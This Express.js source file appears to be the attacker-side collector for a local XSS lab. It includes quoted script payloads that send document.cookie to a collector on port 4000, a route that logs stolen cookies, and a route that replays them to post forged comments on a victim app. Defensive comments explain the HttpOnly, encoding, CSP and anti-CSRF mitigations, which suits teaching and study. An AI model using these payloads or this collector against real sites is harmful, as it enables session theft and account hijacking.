const express = require('express');
const app = express();
const path = require('path');
const request = require('request')
const bodyParser = require('body-parser');

// Parse application/x-www-form-urlencoded request bodies into an object
// (exposed by body-parser as req.body). `extended: true` selects the parser
// that also accepts nested keys.
// NOTE(review): both routes visible in this file read req.query only, so
// this middleware looks unused here — confirm before removing it.
const urlencodedParser = bodyParser.urlencoded({ extended: true });
app.use(urlencodedParser);

// Reflected XSS lab, collector side: receives the value the injected script
// put in the `data` query parameter, logs it and echoes it back as JSON.
// Payload used by the lab, delivered through the `type` parameter of /welcome:
// `/welcome?type=<script>var img=document.createElement('img');img.src='http://localhost:4000/reflect?data=${document.cookie}';img.style.display='none';<\/script>`
// NOTE(review): /welcome is not part of this file; presumably it writes `type`
// into the page without encoding — confirm against the victim app.
// Defensive reading: document.cookie does not expose cookies set with the
// HttpOnly attribute, encoding `type` on output keeps the script from running,
// and a Content-Security-Policy restricting script-src/img-src blocks the
// inline script and the image beacon to this origin.
app.get('/reflect', (req, res) => {
  // `data` is untrusted and is interpolated as-is; it is undefined when the
  // parameter is missing, in which case the message ends in "undefined".
  const message = `攻击者拿到cookie为${req.query.data}`;
  console.log(message);
  res.json({ code: 1, msg: message });
});
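// DOM-based / stored XSS lab, collector side: takes the cookie string the
// injected script sent in `data` and replays it as the Cookie header of a
// comment POST to the app on port 3000.
// Payload used by the lab:
// <script>var img=document.createElement('img');img.src=`http://localhost:4000/addComment?data=${document.cookie}`;img.style.display='none';</script>111
// NOTE(review): the app on port 3000 is not part of this file; the replay
// presumably succeeds only because its session cookie is readable from script
// and the cookie alone authorises /addComment — confirm against that app.
// Defensive reading: HttpOnly on the session cookie removes it from
// document.cookie, encoding stored comments on output keeps the script from
// running, and a per-request anti-CSRF token makes a replayed cookie
// insufficient on its own.
app.get('/addComment', function(req, res) {
  const forwarded = request({
    url: 'http://localhost:3000/addComment',
    method: 'post',
    headers: {'Cookie': req.query.data, 'Content-Type': 'application/x-www-form-urlencoded'},
    form: {comment: '啦啦啦，你被攻击了'}
  });
  // No callback is passed to request(), so failures surface only as an
  // 'error' event. Without a listener that event is unhandled and takes the
  // whole lab process down (for example when nothing listens on port 3000).
  forwarded.on('error', function(err) {
    console.error('forwarding to http://localhost:3000/addComment failed:', err.message);
  });
  // The response is sent immediately, before the forwarded POST completes.
  // NOTE(review): `msg` is the outgoing request object, not the upstream
  // reply; its JSON form appears to include the forwarded headers, Cookie
  // value included — confirm whether echoing that is intended.
  res.json({code: 1, msg: forwarded});
})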

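// Start the lab collector on port 4000.
// Bound to the loopback address: every URL in this file uses localhost, and
// without a host argument the server would accept connections on all
// interfaces, exposing the cookie-logging and cookie-replaying routes to the
// local network. Change the host only if the lab deliberately spans machines.
// The listen callback receives no arguments, so the original (req, res)
// parameters were dropped.
app.listen(4000, '127.0.0.1', function() {
  console.log('打开http://localhost:4000/addComment开始你的邪恶之路~~~')
})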